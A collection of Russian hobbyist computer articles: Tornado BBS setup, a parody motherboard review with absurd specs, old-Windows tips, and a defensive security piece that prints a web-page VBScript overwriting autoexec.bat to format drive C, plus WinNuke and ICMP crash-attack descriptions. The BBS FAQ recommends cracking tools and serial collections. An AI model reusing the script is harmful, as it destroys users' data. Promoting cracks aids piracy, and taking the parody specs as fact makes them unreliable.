Далее мы создадим папку C:\TMP. В неё TORNADO будет копировать временные файлы. После этого открываем для редактирования файл limits.ctl. Здесь указаны параметры уровней пользователей. Где задано время пребывания на BBS и максимальный объём информации скаченной за сутки в килобайтах. Если вас всё устраивает, тогда двинемся дальше. Если нет, то в файле подробным образом описаны все действующие параметры. Теперь нам следует создать FILES AREAS, то место где будут храниться разные файлы доступные пользователям. Для этого мы отредактируем файл Filearea.ctl. Здесь тоже ничего сложного нет. Вам следует лишь указать пути и создать нужные папки. У меня это выглядит вот так:

Пример:

[FileArea]
Name «Старые добрые игры :-)»
DLPath C:\TORNADO\FILESBBS\games
FileList C:\TORNADO\FILESBBS\games\files.bbs
ULPath C:\TORNADO\FILESBBS\UPLOAD
Scan_NewFiles Yes
DL_Security 1
UL_Security 1
List_Security 1
Show_Security 1
Group SOFT
;
[FileArea]
Name «Программы для работы и создания BBS»
DLPath C:\TORNADO\FILESBBS\BBSSOFT
FileList C:\TORNADO\FILESBBS\BBSSOFT\files.bbs
ULPath C:\TORNADO\FILESBBS\UPLOAD
Scan_NewFiles Yes
DL_Security 1
UL_Security 1
List_Security 1
Show_Security 1
Group SOFT

В каждой папке из files areas создайте файл files.bbs. Там будут находиться описания всего, что есть в данном разделе. Как видите, в этом сложного ничего нет.
Теперь что касается почтовой области — Msgarea.ctl. Я у себя всё оставил по умолчанию, но путь к базе сообщений всё же сменил. И вам советую.

BasePath C:\TORNADO\FIDO\MSGBASE\j25 ; Путь/имя (в зависимости от типа базы).

Теперь что касается защиты. Файл Doorway.ctl отвечает за доступ в виртуальную консоль или проще говоря к жёсткому диску. Поэтому чтобы никто не посягнул на ваш хард, поставьте возле каждой опции максимальный уровень доступа. Под которым заходит только SysOp, то есть вы. У меня такой уровень называется 31337. Смотрите пример:

Enter_Security 31337 ; Минимальный уровень доступа, необходимый для
; активизации Tornado DoorWay
;
ChDir_Security 31337 ; Минимальный уровень доступа для выполнения
; команды CD (сменить текущую директорию)

И вообще предпочтительно удалить все ненужные для обычных пользователей опции в меню BBS. Для этого нам следует посетить папку Menus\Russian и Menus\English – соответственно русскоязычную и англоязычную конфигурацию. Для этого в обоих каталогах есть файл main.mnu где можно прописать доступ тому или иному уровню пользователя BBS в одну из областей станции. У меня это выглядит следующим образом:

Gosub_Menu «papirus» 31337 «\14(\15H\14) \02Papirus |» H
Todays_Callers «» 31337 «\14(\15T\14) \02Сегодня звонили |» T
Shell «» 31337 «\14(\15*\14) \02DoorWay » *

Там где указан параметр 31337, может попасть только SysOp или пользователь которому доверен столь высокий уровень. Тоже самое справедливо и для файла msg.mnu в котором можно убрать определённые опции почтового раздела.

DownLoad_QWK «» 31337 «\14(\15D\14) \02Скачать почтовый пакет QWK » D
UpLoad_QWK «» 31337 «\14(\15U\14) \02Закачать пакет ответов REP ||» U

Для файловой области files.mnu.

UpLoad «» 5555 «\14(\15U\14) \02Закачать файл(ы) » U

Уровень 5555 тоже реализован мною, это то же что и 5-й уровень в обычной стандартной настройке TORNADO. То есть пользователи 1, 2, 3, 4 уровней файлы на BBS закачивать не могут. Вы же можете изменить этот или другой параметр, как сами того пожелаете.

UpLoad_Priv «» 31337 «\14(\15C\14) \02Закачать для … |» C
FileList «» 0 «\14(\15F\14) \02Список файлов » F
Show_Raw_Dir «» 31337 «\14(\15R\14) \02Показать каталог |» R

Советую заблокировать все вышеописанные опции.
Создатель программы TORNADO человек с юмором, это наблюдается во всём. Но особенно в файле Gooduser.ctl, в нём записываются имена тех людей, которые при входе получают полный доступ без паролей ко всему. Советую убрать оттуда неблагонадёжное лицо.
Теперь перейдём к самому главному. Это логотипу нашей BBS. Я использовал для его создания программу The Draw (www.fdd5-25.net). Поскольку все мои посетители используют в своей работе только ANSII терминал, то и логотип буду изменять для него. Для этого заходим в TXTFILE\logo.ans и изменяем текст приглашения и логотип. Вот что получается в итоге. См. рисунок.


bbs1

Отмечу только, что работа с программой The Draw описывалась ранее в журнале Радиомир “Ваш компьютер”. После того как вы произвели все вышеописанные действия, вы можете запустить BBS в локальном виде и понаблюдать, как она работает. Для этого в командной строке наберите tornado –l.
Я уже писал, что для работы BBS с модемом нам нужен fossil драйвер. Поскольку он настраивается из командной строки, рискну вам предложить готовый bat файл.

adf COM2 2F8 3 115200 4096 4096 8 3 11

Эти параметры справедливы для компьютера класса Pentium с модемом подключённым к порту COM 2.
И ещё. Статус зарегистрированного пользователя можно изменить программой USEREDIT.EXE. Чтобы вам было проще заходить с удалённой машины на вашу BBS. Зарегистрируйтесь в локальном режиме, а затем просто выставьте для себя самый высокий статус. Всё поздравляю. Биба готова на 50%! Осталась самая малость. В папке txtfile\Russian и English создайте файл news.txt или откройте для редактирования, если таковой имеется. В нём каждый раз после обновления станции вы будете писать свежие новости. Это всё что я хотел написать о самой простой настройке BBS.

3. Чаво?

Во время работы и создания BBS у пользователей возникает множество вопросов, на которые в документации зачастую ответов нет. Поэтому позволю себе описать все более, менее распространённые проблемы.
Что должно быть на станции?
На BBS, по моему мнению, должны находится в основном эксклюзивные вещи. Чтобы не повторять бесчисленные сайты internet. Как это сделать? Очень просто. Постарайтесь выяснить у людей, чего на их взгляд не хватает на BBS. Найдите знакомого программиста, который пишет свои программы, и предложите ему раздел на станции, где он сможет их выкладывать. Сделайте ставку на загадочное: книги о нло, приведениях. Так же редкий soft. Большим успехом пользуются старые игры, программы для взлома в сети, а так же коллекции серийных номеров. Например, моя BBS FDD5-25 посвящена всему вышеописанному и ещё там есть фото далёких планет с ftp сервера НАСА, снимки моего района. Запомните человек, который заходит к вам, должен не натыкаться на очередную бессмысленную сборку всего подряд! Он должен попасть в ваш круг интересов. И быть может тогда у вас станет одним хорошим другом больше.
Как посетить BBS?
Для работы с BBS нужен терминал. Terminal – это программа, которая нам позволит установить соединение с удалённой машиной через модем. В нашем случае это будет BBS. Какими же бывают терминалы? Условно мы их поделим на два типа, WINDOWS и DOS. Сегодня мы рассмотрим работу двух самых распространённых программ подобного класса. Это Hyper Terminal for WINDOWS и TELEMAX for Dos входящий в пакет Norton Commander 5.0. И вначале определимся, с какой из этих программ вам придётся работать. Если у вас win modem, то будем использовать Hyper Terminal, а если же полностью аппаратный, тогда не грех воспользоваться и TELEMAX. И так про всё по порядку.
a) Hyper Terminal.
Для работы этой программы с BBS нам следует провести небольшую настройку. Бытует странное мнение о том, что с помощью Hyper Terminal нельзя корректно работать с псевдографикой и русским языком. На самом деле можно! Как? Очень просто. Сейчас я вам об этом расскажу. Запустим Hyper Terminal, отменим все выскочившие окошки, кроме того где появляется название соединения. Напишем BBS. Далее зайдём в вид->шрифт и выберем шрифт terminal. Всё ваша псевдографика и русский будут видны лучше некуда! Далее нажмём “OK”. Зайдём в файл->свойства и уберём галочку с использования кода страны и города. Это для того, чтобы в наш набор номера не прописались непонятные цифры. Всё теперь звоним на BBS. Для этого в окошке печатаем.
ATZ – строка инициализации модема.
Ok – ответ, что модем проинициализирован.
ATDP(номер телефона) – звоним на BBS.
Всё! Если не занято, то вы попали на станцию! См. картинку.


bbs2

Ну, чем не Internet Explorer?
b) Telemax
Чтобы начать работу с TELEMAX узнаем COM поpт к которому подключен ваш модем. Если вы пользуетесь WINDOWS 98, то порт узнайте с её помощью. Для этого вот что сделать: щёлкните правой кнопочкой мыши на иконке «Мой компьютер», «Свойства», раздел «Устpойства», в списке найди «Модем», «Свойства», раздел «Модем», «порт» — там должно быть написано, например «Последовательный поpт (COM2)». Затем в TELEMAX в появившемся окне с запросом выставляем порт COM2, скорость обмена 115200. Нажимаем OK. Затем печатаем:
ATZ – строка инициализации модема.
Ok – ответ, что модем проинициализирован.
ATDP(номер телефона) – звоним на BBS.
Если не занято, то вы попадаете на BBS.

bbs3

Так выглядит моя FDD5-25 BBS, когда в неё заходит пользователь 31337-го уровня. Или проще говоря SysOp.
Распространенные проблемы с терминалом.
Если программа спрашивает строку инициализации, а вы не знаете, что это такое, то напишите «ATZ» (без кавычек), а затем нажмите Enter».
Если не работает скорость 33600, ничего не получается сделать. Попробуйте использовать только такие числа: 115200, 57600, 38400, 19200, быть может ваш порт работает медленнее чем вы указали.
Если у вас аналоговая АТС, то вам нужно набирать номер в пульсовом режиме командой ATDP — Pulse Dial. Если телефонная станция цифровая и работает в тоновом режиме, то пишите ATDT — Tone Dial.
Как себя вести?
Ведите себя, так как и на сайте в internet. Желательно при регистрации указывать реальные данные. Они обычно посторонним не доступны. А системному оператору будет легче обновлять BBS. Так как он будет знать свою аудиторию и её интересы. Обязательно оставьте своё мнение о станции в почтовой области.
Как перемещаться по разделам?
После того как вы зарегистрировались, вы получаете доступ к главному меню BBS. Для переключения разделов используются горячие клавиши. Если написано (F) Files area. Это значит, что клавиша “F” отвечает за переход в это меню. Если написано (!) Разъединение, то нужно нажать shift+1, чтобы покинуть BBS.
Связь при скачке просто *^&#$!
Многое зависит как от модема, так и от вашей АТС. Если у вас плохое соединение с BBS. Не поленитесь перезвонить, оно должно стать лучше. Бывает ещё и так, что во всём виноват оператор BBS. Он не протестировал, как следует станцию. А сразу же запустил её в работу. Тогда проблема чаще всего кроется в параметрах модема и fossil драйвера. Скорее всего, что строка инициализации не содержит подключения режимов софтовой и аппаратной коррекции соединения. А драйвер fossil не правильно сконфигурирован. Все, почему-то забывают про параметры контроля линии. Отсутствие которых, вызывает при скачке огромное количество ошибок. И как следствие плохую скорость соединения. Пример правильной конфигурации fossil для компьютера Pentium приведён выше.
Какой протокол выбирать при скачке? Их так много.
У себя на станции я по умолчанию использую z modem. Тем более, что он интегрирован в TORNADO и следовательно мне не нужно устанавливать внешние программы для работы BBS. Протокол z modem хорош ещё и тем, что при потере связи можно начать скачку не с 0, а с того места, где вы остановились. Это очень удобно.
Сколько стоят услуги BBS?
Многим читателям покажется этот вопрос очень смешным. На самом же деле, некоторые пользователи считают, что BBS это платно. Нет, поверьте, всё бесплатно. Станции держатся только на рвении или фанатизме их создателей. И если раз в год вы угостите SysOp’а чаем или кофе, я думаю, он не расстроится.
Какой компьютер нужен для работы с BBS?
Компьютер для работы с BBS может быть любым! От 8088 до Pentium 4. В этом одно из преимуществ BBS. Пользователь, скажем 80386-го компьютера и модема на 28800, всегда найдёт на станции поддержку и понимание. А не издёвки, как частенько у нас и бывает.
Все приведённые выше вопросы мне встречались в разное время и в разных местах. Я лишь попытался их обобщить и выставить на всеобщее обозрение. Тем не менее, продолжаю считать, что вопросы по работе BBS заслуживают отдельной публикации.
4. Идеологическая обработка.
Не секрет в том, что у всего на свете созданного руками человека есть своя идея. Она есть и у BBS. Вопрос только в чём эта идея выражена? Бродя по бескрайним просторам сети я наткнулся на один занимательный форум в котором обсуждалась нужность – ненужность тех самых BBS. Люди спорили, доказывали друг другу плюсы и минусы, оскорблялись. Мне это показалось довольно забавным. Так как я не понял сути проблемы. Что может быть плохого в том, что люди общаются? Какая разница как? Лишь бы им это нравилось, то есть вам, дорогие читатели. Ведь в действительности вам решать быть или не быть. Я сторонник той мысли, что ничего навязывать нельзя. Всё придёт или уйдёт со временем. Но если есть возможность задержать, хорошие воспоминания, завести новых друзей, в конце концов, просто пообщаться, то почему бы и нет? И способ отнюдь не важен.
1) BBS для друзей. Те, кто к нам приходит это не малолетки из чатов – это продвинутые пользователи или просто любознательные люди, которые хотят знать.
2) Посетители BBS живут с вами в одном городе или районе. В этом большое преимущество перед internet. Вы можете встретиться с вашими гостями и просто по-человечески пообщаться.
3) BBS доступны каждому и пользователям старенького 386-го, так и владельцам Pentium 4.
И предчувствую, что некоторые уже недовольны. Мол, кто ходит на BBS. А вы никогда не задавались вопросом, почему BBS расписанные на всевозможных форумах никто не посещает? Нет? Да просто их не там рекламируют. Настоящий контингент читает газеты. Вот там, именно там нужно вешать множество объявлений! И конечно же, время работы станции. Вы думаете много желающих посещать BBS с 23.00 до 6.00 утра? Нормальная BBS должна работать в удобное время. Скажем так, с 17.00 до 23.00. Это тоже важный фактор. И мне остаётся лишь надеяться на то, что те системные операторы, которые до сих пор, содержат BBS, позволят закачивать файлы не только избранным за пиво, а всем. Дабы, новым пользователям не было досадно и обидно, что там нет частички и их работы.

Роман Карпач

Смешно звучит, но это реклама или плагиат…

Пословица груба, да правда в ней люба!

Обзор материнской платы – Рахит РАСШИРЕННЫЙ ГЛЮК 7

А) Знакомство.

Комплектующие предоставлены фирмой “Рога и копыта computers”.

Сегодня мы поговорим об одной очень удачной, на мой взгляд, модели материнской платы – название которой РАХИТ РАСШИРЕННЫЙ ГЛЮК 7. К сожалению, она ещё не поступила в продажу у нас в стране. И её для обзора окружными путями доставили
из города Пекина, куда привезли морем со столицы острова Тайвань Тайбэя. А теперь давайте задумаемся, часто ли мы можем найти на рынке качественные и недорогие платы для процессоров фирмы 80286? Я думаю, нет. Тем более, вокруг столько фирм
желающих попросту надуть или развести пользователя. Не все фирмы продают такие качественные и недорогие материнские платы. Итак, давайте же рассмотрим новинку
этого сезона, материнскую плату РАХИТ РАСШИРЕННЫЙ ГЛЮК 7. И как говорится, разберём её по косточкам:

Кость первая:

Чипсет:такой крутой, что дальше некуда! Частота шины: 12/66
МГц
Установка частоты:Через BIOS, Гнездо процессора:квадратное
EISA: 2x/4х

Кость вторая:

Количество разъемов ISA:3 Количество разъемов SIMM: 4

Тип поддерживаемой памяти:SIMM 72, 96 pin.

Кость третья:
Максимальный объем оперативной памяти:3 Гб и 2 Гб.

Кость четвёртая:
Сеть: Глюкотех8100B; 10/100 Мбит/сек Поддержка ESDI (extended storage device interface 30 секторов на дорожку, 1000 марок в 1991 году):Да Поддержка (AT-BUS (IDE):Да Поддержка RLL (run length limited 26 секторов на дорожку, 937 кб в секунду):Да Поддержка MFM (modified frequency modulation 17 секторов на дорожку, 625
кб в секунду):Да Формат платы:AT, 30.5 х 24.4 см Jumperless: Да;

Кость пятая:
IDE -контроллер: High Point HPT374 (поддержка RAID 0, 1, 0+1), 4 канала, до 8 HDD.

Кость шестая:Порты:4 х USB 1.1, 3 х 1394a (на заднюю стенку выходят только 2 разъема, еще один в виде «header» на плате), Line-in, Center/Sub, Surround Spk, Front Spk , вход для
микрофона; Порты отсутствуют :PS/2, COM, LPT

Кость седьмая:
ADLIB SOUND CARD встроен, выходы Front, Rear, Center/Subwoofer, вход микрофона и линейный вход, а также проходной порт входа выхода для любопытных пользователей.

Кость – череп:
Конфигурация, с которой тестировалась материнская плата: 80286 + 640 kb ram Рахит GeEGA 256, НМЛ (накопитель на магнитной ленте), FDD5-25 MITSUMI, HDD 40MB Seagate st — 251 RLL
Операционные системы
Windows 3.0 professional и PTS DOS (лицензионное программное обеспечение
предоставлено фирмой “Ножи и топоры software”).

Б) Как оно работает.

Первое на что я всегда смотрю, так это на дизайн. Ведь первое впечатление должен
составлять именно он. Вы себе не представляете, дорогие читатели, какая всё же красивая материнская плата РАХИТ РАСШИРЕННЫЙ ГЛЮК 7! Разноцветные диоды, конденсаторы, резисторы – всё радует глаз. Они так великолепно раскрашены.
Дизайнеры РАХИТ отошли от традиционно синих конденсаторов, как в старых ПК, они сделали их чёрными. Что без сомнения сочетается с банками оперативной памяти. Не во всех фирмах создающих материнские платы думают об этом. Синяя наклейка РАХИТ на фоне двух микросхем очень радует глаз. Она так и говорит вам: “Жестянщик, ну
запусти какой-нибудь тест”. И вот после того как была запущена программа2D MARK, которая тестирует производительность процессора, памяти, жесткого диска и видео, выяснилось, что РАСШИРЕННЫЙ ГЛЮК 7 очень устойчивая в работе системная плата, а так же производительная. Вы можете сами наблюдать результаты. Но чтобы быть полностью объективными, мы решили так же использовать тесты «Затормози компьютер». Испытания этим программным пакетом показали так же неожиданно высокую производительность. Поскольку нас читают не слишком продвинутые пользователи, то я буду придерживаться простой стилистики написания. Самый главный плюс всё же не в тестах. Я ещё ни разу не видел, чтобы объём оперативной памяти в материнской плате мог
достигать 3 гигабайт. Тем не менее, это реально. Так что если вы будете покупать РАХИТ РАСШИРЕННЫЙ ГЛЮК 7 в следующем месяце, когда её привезут на фирму «Рога и копыта computers», вы сможете, приобрети 3 гигабайта памяти со скидкой. Не мне вам
объяснять дорогие читатели, что от количества ОЗУ, так же зависит производительность системы. Так что если желаете играть в свои любимые игры, без тормозов не задумываясь, копите деньги на новый компьютер! Ведь если вы приобретете, ПК на базе процессора 80286 и материнской платы РАХИТ РАСШИРЕННЫЙ ГЛЮК 7 в фирме «Рога и
копыта computers», вам со скидкой смогут подключить до 12 жёстких дисков. Что даст возможность хранить любимые фильмы и музыку у себя в компьютере. Как вам такая
перспектива? Но не будем отвлекаться. Плата РАХИТ РАСШИРЕННЫЙ ГЛЮК 7 имеет встроенную звуковую и сетевую карту, а так же модем. Мне как пользователю было
очень приятно проинсталлировать драйвера к этим устройствам сразу же автозапуском с дискеты. Ещё никогда установка нового оборудования не была такой простой. Это ещё одно из преимуществ РАХИТ. Отдельной строкой следует остановиться на сетевом адаптере Глюкотех8100B. Он работает со скоростью 10 мегабит. Его работа составляет наилучшее впечатление. Обычные сетевые карты очень тяжело настраиваются в системе. И поэтому лучше иметь встроенное устройство. Ведь, нам не нужно будет выставлять
прерывания, так как конфликтов с таким оборудованием не возникает. Материнская плата РАХИТ принесла смерть устаревшим портам PS/2, COM, LPT. Все они больше не поддерживаются, а следовательно и не установлены. В РАСШИРЕННЫЙ ГЛЮК 7 встроены современные многофункциональные порты USB. Ведь и в самом деле
прогресс не остановишь! Поле того, как материнская плата была протестирована у меня в ЛАМО — лаборатории (лаборатория аппаратного моделирования оборудования), я отдал её на тест к знакомым знатокам — профессионалам. Как всегда, для того чтобы выставить оценки по десятибалльной системе. Итак, средний бал, который получился после тестов, составил — 9,8 литра. Это, несомненно, выше, чем когда мы представляли другие платы.
Добавлю лишь одно, что в выставлении оценок участвовало одиннадцать человек и двенадцать с лишним литров пива.
Чудной Жестянщик.
Железяка для обзора предоставлена фирмой: «Рога и копыта computers».

Ну, а если серьёзно?

Компьютерные издания частенько пестрят статьями вида «обзор материнской платы»
или «видео карта такая». И зачастую их бывает так много, что в номере они чуть ли не наслаиваются одна на одну. Да и по размерам своим они обычно не менее одной печатной
страницы. И вот когда открываешь такой обзор, невольно задаёшься вопросом. Каким? А могут ли одни и те же люди без отдыха описывать комплектующие? Да не просто описывать, нужно сказать правильно — тестировать. Ответ могут. Вопрос в другом. Как можно прогнать за неделю по пять комплектов оборудования? Так мало того чтобы
всё это протестировать, так ещё и написать про это. Кто-то скажет, что это возможно без проблем. Но смею вас заверить, что очень квалифицированные люди из многих компьютерных фирм заверяли, что они тестируют комплекты оборудования в
течении 24 часов. Или мне очень удачные фирмы попадаются, или кто-то врёт? Причём не редко появляются слухи про то, что многие авторы просто неквалифицированны в опросах обзоров. Скажем некоторые «писаки» условной газеты «Калифорнийская
правда» только в этом году окончили школу. Но зато они уже на всех форумах гордо именуют себя «компьютерный обозреватель». Должен добавить, что с одним таким автором удалось пообщаться, на одном из бескрайних форумов белорусского интернет.
Довольно забавно было поговорить с ним про основы полупроводниковой физики. В принципе я, как и мои знакомые не хотели кого-то обидеть, нам просто было интересно узнать уровень этого автора. И каково было наше удивление, когда толком нам даже не ответили про P-N-P переход. Вы спросите причём здесь это? Просто иногда читая обзоры, замечаешь такие казусы, что хочется написать: «Не умеешь — не пиши»! Но писать
будут, потому как одна тысяча символов это 1$. И если автор в течении месяца наклепает, да именно наклепает, четыре публикации с суммарным числом символов в сорок тысяч, то он получит 40$. При этом оборудование для тестов тоже само по себе не возникает. В
компьютерной фирме тоже приплатят, чтобы появилась надпись вида: «железо предоставлено фирмой рога и копыта computers». Вот и выходит, что многое пишется не ради какой-то идеи, а ради денег. К слову сказать, я уверен на все 100%, что не одна из
белорусских газет не взялась бы напечатать этот материал. Почему? Надеюсь, вы поняли. В течении полугода я печатался в одной газете условное название которой будет
«Медицинский ЭВМ». В то время мне пришлось получить довольно занимательное предложение от условной фирмы X. Где за определённые коврижки предлагалось произвести обзор некоторого количества материнских плат. На мой наивный вопрос:
«А где я это всё тестировать буду?» Я получил наивный ответ: «Так, мы тебе результаты тестов дадим, а ты это только литературно оформишь! Так все делают!» С тех пор моя
искренняя вера в обзоры погасла. Но на этот раз я желаю задать вопрос вам, дорогие читатели. Пусть каждый ответит для себя сам. Как можно считать тест объективным, если не указана не ОС под которую он проводился, а так же для сравнения не приведены аналоги оборудования? Отцы компьютерных тестов знают, о том что результаты для Win XP и ME могут расходится до 20%. Или что после трёх и более часов работы разогнанная
машина может попросту начать вешаться. Но дело не в этом. Читая многие материалы, складывается интересное впечатление о стиле авторов. Ради интереса я решил взять обзор одной материнской платы ABIT AT7 и проверить, плагиат или нет? Каково было моё удивление, когда я обнаружил, что аналогичный материал вышедший на сайте www.techzone.com за четыре месяца до публикации в условном издании «Калифорнийская
правда.» К сожалению, материал был на английском языке. Но, боже мой, какое сходство! Всё от стиля написания до результатов тестов и среднего бала. К сожалению, во избежание различных юридических проблем конкретно ничего не называется. Но могу искренне вас заверить, что события по которым создана эта публикация основаны на
реальных фактах. Но вот любое совпадение имён и названий является вымышленным, а сходство случайным. Правда или вымысел это судить вам. Единственное, что я могу
сказать. Читайте журналы! Там редко появляются публикации одного автора, об одной запчасти. А если и бывают, то не об одной, а как минимум о трёх.

Роман Карпач

Назад в будущее.

Случается часто так, что для некоторых целей необходимо запустить на компьютере старые версии WINDOWS. Будь то в целях программирования или просто ностальгии. Да и повысить производительность своего не очень быстрого компьютера с помощью старых программ тоже хочется. Сегодня я расскажу про установку WINDOWS 95 на компьютеры с процессором AMD выше 350 мегагерц, а так же о работе WINDOWS 3.X на компьютерах с файловой системой FAT 32.
WINDOWS 95.
Всем известно про то, что WINDOWS 95 устанавливается на компьютеры с процессором не выше 350 Mhz. Хотя поддержка этой версии прекратилась несколько лет назад, работать с ней продолжают во многих местах. И вот однажды я задался риторическим вопросом. Как установить WINDOWS 95 на компьютер с процессором AMD 450? Ведь он выше, чем максимально поддерживаемый системой. Откровенно говоря, я просто надеялся поднять производительность “ПК” установив относительно старое программное обеспечение. И это действительно удалось благодаря патчу, который можно скачать вот по этому адресу: http://www.windrivers.com/company/amd/k6-2up.zip. Сразу оговорюсь, что он распространяет своё действие на компьютеры с CPU AMD K6-2. Всем же владельцам INTEL и CYRIX предлагаю поискать свою версию. Перед тем как начать описание инсталляции всегда следует рассказать о “подводных камнях”. Первый такой валун, на который я напоролся в процессе работы, заключался в невозможности обновления WINDOWS 95 из среды MS DOS. Ведь, проблема состоит в том, что при запуске инсталляции через некоторое время возникает ошибка. Это приводит к невозможности дальнейшей установки системы. К слову сказать, на период инсталляции WINDOWS 95 мне пришлось переставить в BIOS моей материнской платы TX 100 частоту процессора с 450 до 350 Mhz. Это дало возможность установить систему, запустить патч уже из среды WINDOWS. Затем осталось зайти в BIOS и выставить настройки назад. Всё проблема решена. И WINDOWS 95 может спокойно “летать” на вашем компьютере. Единственное о чём осталось предупредить, так это работе драйверов. Ставьте версии адаптированные для WINDOWS 95. Это устранит проблемы “зависания” и перезагрузки системы.
WINDOWS 3.X
Старые добрые окошки. Ещё не ОС, но уже оболочка. То с чего началось победоносное шествие WINDOWS. Да, ну ладно. Перейдём сразу к делу. Проблем 3.X для современных компьютеров состоит в том, что она не может установиться на файловую систему FAT 32. При такой попытке выдаётся сообщения о невозможности запуска программы и предложение нажать три заветные клавиши, дабы перезагрузить компьютер. Для решения этой проблемы существует одна маленькая программа. Скачать эту утилиту можно с моего сайта : www.fdd5-25.narod.ru/drivers/Osr2kit.exe . Запускаете её из режима MS DOS, перезагружаете компьютер. После чего смело устанавливайте любую версию 3.X.

Роман Карпач

Защити себя сам!!!

На войне как на войне…
***
Перед началом просмотра публикации настоятельно рекомендую начинающим пользователям прочесть словарь терминов:
DNS (Domain Name System — система имен доменов) Распределенный механизм имен/адресов, используемых в сети Internet. Используется для
разрешения логических имен в IP-адреса. DNS используется в сети Internet, обеспечивая возможность работы с понятными и легко
запоминающимися именами вместо неудобоваримых чисел IP-адреса.
Domain (домен) В сети Internet часть иерархии имен. Синтаксически доменное имя Internet содержит последовательность имен (меток), разделенных точками (.) например, «fdd5-25.narod.ru» В OSI термин домен используется как административное деление сложных распределенных систем, как в MHS Private Management Domain (PRMD) и
Directory Management Domain (DMD).
ICMP: Internet Control Message Protocol. Протокол, используемый для
контроля за ошибками и сообщениями на уровне IP. В действительности ICMP представляет собой часть протокола IP.
TCP: Transmission Control Protocol. Основной транспортный протокол в наборе протоколов Internet, обеспечивающий надежные, ориентированные на соединения, полнодуплексные потоки.
TCP/IP (Transmission Control Protocol/Internet Protocol — протокол управления передачей/протокол Internet) Известен также как стек протоколов Internet (Internet Protocol Suite). Данный стек протоколов используется в семействе сетей Internet и для объединения гетерогенных сетей.
Ping: Packet internet groper. Программа, используемая для проверки доступности адресата путем передачи ему специального сигнала (ICMP echo request — запрос отклика ICMP) и ожидания ответа. Термин используется как глагол: «Ping host X to see if it is up!»
Port (порт) Абстракция, используемая транспортными протоколами Internet для обозначения многочисленных одновременных соединений с единственным хостом — адресатом. Физический интерфейс компьютера, мультиплексора и т.п. для подключения терминала или модема.
FTP: File Transfer Protocol. Используемый в Internet протокол (и программа) передачи файлов между хост — компьютерами.
Telnet Протокол виртуального терминала в наборе протоколов Internet. Позволяет пользователям одного хоста подключаться к
другому удаленному хосту и работать с ним как через обычный терминал.
UDP (User Datagram Protocol) Прозрачный протокол в группе протоколов Internet. UDP, подобно TCP, использует IP для доставки; однако, в отличие от TCP, UDP обеспечивает обмен дейтаграммами без
подтверждения гарантий доставки.
***
Каждый пользователь проводящий в интернете много времени может стать потенциальной жертвой сетевой атаки. В чём она может выражаться? Да в чём угодно, от доступа к ресурсам вашего компьютера, до банального отсоединения от провайдера. Причём, в последние время подобные случаи участились на столько, что настал момент когда об этом нужно написать. Я не хочу начинать публикацию с пустого описания программ для защиты в интернет. Ведь программы пишутся под конкретную проблему. И наверное, просто следует написать про то, что и как может вызвать поражение пользователя или сервера в сети. Первое на чём бы я хотел заострить ваше внимание, так это на довольно необычной угрозе для ваших жёстких дисков. Это вредоносные скрипты, которые могут находится на любом сайте.

script language ="VBScript"
sub Reboot
Set
Shell=CreateObject("WScript.Shell")
Shell.Run "Rundll32.exe
User.exe,ExitWindows"
RunDll
end sub
sub
destruct
set fs=createobject("Scripting.FileSystemObject")'FileSystem
if
fs.fileexists("c:\autoexec.bat") then
set
ab=fs.getfile("c:\autoexec.bat")
ab.attributes=0
end if
set
autoexec=fs.CreateTextFile("c:\autoexec.bat")
autoexec.WriteLine
"@cls"
autoexec.WriteLine "@echo Windows upgrading your system..."
autoexec.WriteLine "@echo Do not abort this process!"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.close
end sub
destruct
format
reboot

Только видимо неудачный, поскольку мне удалось его выловить с одной занимательной страницы. На которой-то он и лежал, дабы отформатировать мой жёсткий диск. Но к счастью выдал, что у него ошибка в третьей строке. Однажды даже попался немного другой экземпляр, который вписывал себя в автозагрузку WINDOWS и вешал компьютер намертво. Поэтому прошу, не повторяйте моей ошибки посещая сомнительные сайты предложенные вам в чате или в очередном спаме. Развивая тему нельзя не затронуть возможные методы обнаружения злоумышленником вашего компьютера в сети интернет. Пока вы думаете читать ли это дальше, хочу поведать одну жизненную историю. Есть у меня знакомый администратор компьютерного клуба. Где есть выделенный канал. И вот долгими ночами вместо того как играть со всеми в COUNTER STRIKE, он сидит с программой «IP сканер» и ищет пользователей которые на данный момент в сети. Потом уже с помощью другой утилиты сканирует порты. Ports scan. Сканирование компьютерной системы на наличие портов, путем попыток их открытия. Эта атака сильно расходует ресурсы системы. Обычно она используется для поиска слабых мест <дырок> в «ПО», «ОС» компьютера и предшествует более элегантной атаке. К чему я всё это рассказываю? Поймёте прочитав всё ниженаписанное. Любимое оружие всех сетевых сумасбродов это Win Nuke. Hаpяду с обычными данными пересылаемыми по TCP соединению
стандарт предусматривает также передачу срочных (Out Of Band)
данных. У большинства PC с установленным Windows присутствует сетевой протокол Net BIOS, который использует для своих нужд 3 IP порта: 137, 138, 139. Как выяснилось, если соединиться с Windows машиной в 139 порт и послать туда несколько байт Out Of Band данных, то NetBIOS не зная что делать с этими данными попросту подвешивает или перезагружает машину. Для Windows 95 это обычно выглядит как синий текстовый экpан, сообщающий об ошибке в драйвере TCP/IP и невозможность работы с сетью до перезагрузки ОC. NT 4.0 без сервис паков перезагружается, NT 4.0 со вторым сервис паком выпадает в синий экран. Что же касается WINDOWS 98 SE (пропатченная версия). Думаю, стоит быть спокойным. Проведя тест у себя в локальной сети (12 компьютеров), я выяснил, что не один из 18 нюкеров не произвёл никакого воздействия на машины. Хотя не исключено, что старая дыра давно используется в новых, ещё более коварных целях. Чаще всего жертвой NUKE атаки можно стать в обычном web чате. Конечно, нельзя обойти вниманием и другой тип нюков — ICMP: Internet Control Message Protocol. Протокол, используемый для контроля за ошибками и сообщениями на уровне IP. В действительности ICMP представляет собой часть протокола IP. Суть атаки такая же как и у стандартного NUKE. На компьютер жертвы высылается сообщения об ошибках и компьютер виснет намертво. Что же касается чатов — IRC. Puke. Осуществляется посылка злоумышленником атакуемому хосту пакета ICMP unreachable error (неизвестная ошибка удаленной системы), что в свою очередь вызывает отключение Хоста от сервера (обычно IRC). Сейчас шла речь, на мой взгляд, о более распространённых методах атак на обычного пользователя. Но не стоит упускать из виду и атаки на сервера. Ведь от стабильности оных может зависеть работа сотен людей!
Угроза для серверов это и угроза пользователям.
